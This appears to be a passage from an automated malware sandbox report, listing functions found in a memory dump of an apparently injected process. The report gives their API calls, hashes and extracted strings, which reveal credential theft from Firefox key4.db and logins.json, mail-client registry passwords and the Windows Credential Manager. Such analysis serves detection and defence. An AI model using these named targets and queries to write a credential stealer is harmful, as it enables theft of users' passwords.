                                                                                              • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                              • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                              • API String ID: 4171719235-3943159138
                                                                                              • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                              • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                              • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                              • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                              • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                              • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                              • GetDC.USER32 ref: 004104E2
                                                                                              • strlen.MSVCRT ref: 00410522
                                                                                              • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                              • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                              • sprintf.MSVCRT ref: 00410640
                                                                                              • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                              • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                              • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                              • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                              • GetClientRect.USER32(?,?), ref: 00410737
                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                              • String ID: %s:$EDIT$STATIC
                                                                                              • API String ID: 1703216249-3046471546
                                                                                              • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                              • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                              • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                              • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004024F5
                                                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                              • _mbscpy.MSVCRT ref: 00402533
                                                                                              • _mbscpy.MSVCRT ref: 004025FD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscpy$QueryValuememset
                                                                                              • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                              • API String ID: 168965057-606283353
                                                                                              • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                              • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                              • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                              • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004027BE Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00402869
                                                                                                • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                              • _mbscpy.MSVCRT ref: 004028A3
                                                                                                • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                              • _mbscpy.MSVCRT ref: 0040297B
                                                                                                • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                              • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                              • API String ID: 1497257669-167382505
                                                                                              • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                              • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                              • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                              • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                              • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                              • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                              • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                              • DeleteObject.GDI32(?), ref: 00401226
                                                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                              • ShowWindow.USER32(00000000), ref: 00401253
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                              • ShowWindow.USER32(00000000), ref: 00401262
                                                                                              • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                              • memset.MSVCRT ref: 0040128E
                                                                                              • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                              • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                              • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                              • String ID:
                                                                                              • API String ID: 2998058495-0
                                                                                              • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                              • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                              • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                              • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcmp$memcpy
                                                                                              • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                              • API String ID: 231171946-2189169393
                                                                                              • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                              • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                              • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                              • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                              • API String ID: 633282248-1996832678
                                                                                              • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                              • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                              • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                              • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406746 Relevance: 30.3, APIs: 16, Strings: 4, Instructions: 287COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • , xrefs: 00406834
                                                                                              • key4.db, xrefs: 00406756
                                                                                              • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                              • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memcmp$memsetstrlen
                                                                                              • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                              • API String ID: 3614188050-3983245814
                                                                                              • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                              • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                              • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                              • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040A953 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                              • API String ID: 710961058-601624466
                                                                                              • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                              • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                              • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                              • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: sprintf$memset$_mbscpy
                                                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                              • API String ID: 3402215030-3842416460
                                                                                              • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                              • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                              • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                              • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                                                                                                • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                                                                                                • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                                                                                                • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                                                                                                • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                              • strlen.MSVCRT ref: 0040F139
                                                                                              • strlen.MSVCRT ref: 0040F147
                                                                                              • memset.MSVCRT ref: 0040F187
                                                                                              • strlen.MSVCRT ref: 0040F196
                                                                                              • strlen.MSVCRT ref: 0040F1A4
                                                                                              • memset.MSVCRT ref: 0040F1EA
                                                                                              • strlen.MSVCRT ref: 0040F1F9
                                                                                              • strlen.MSVCRT ref: 0040F207
                                                                                              • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                              • _mbscpy.MSVCRT ref: 0040F2CD
                                                                                              • _mbscpy.MSVCRT ref: 0040F30E
                                                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                                                                                              • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                              • API String ID: 1613542760-3138536805
                                                                                              • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                              • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                              • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                              • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                              • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                              • API String ID: 1012775001-1343505058
                                                                                              • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                              • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                              • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                              • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00444612
                                                                                                • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                              • strlen.MSVCRT ref: 0044462E
                                                                                              • memset.MSVCRT ref: 00444668
                                                                                              • memset.MSVCRT ref: 0044467C
                                                                                              • memset.MSVCRT ref: 00444690
                                                                                              • memset.MSVCRT ref: 004446B6
                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                              • memcpy.MSVCRT ref: 004446ED
                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                              • memcpy.MSVCRT ref: 00444729
                                                                                              • memcpy.MSVCRT ref: 0044473B
                                                                                              • _mbscpy.MSVCRT ref: 00444812
                                                                                              • memcpy.MSVCRT ref: 00444843
                                                                                              • memcpy.MSVCRT ref: 00444855
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpymemset$strlen$_mbscpy
                                                                                              • String ID: salu
                                                                                              • API String ID: 3691931180-4177317985
                                                                                              • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                              • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                              • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                              • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$Library$FreeLoad
                                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                              • API String ID: 2449869053-232097475
                                                                                              • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                              • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                              • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                              • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sprintf.MSVCRT ref: 0040957B
                                                                                              • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                              • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                              • sprintf.MSVCRT ref: 004095EB
                                                                                              • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                              • memset.MSVCRT ref: 0040961C
                                                                                              • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                              • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                              • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                              • String ID: caption$dialog_%d$menu_%d
                                                                                              • API String ID: 3259144588-3822380221
                                                                                              • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                              • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                              • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                              • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                              • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                              • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                              • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                              • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                              • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
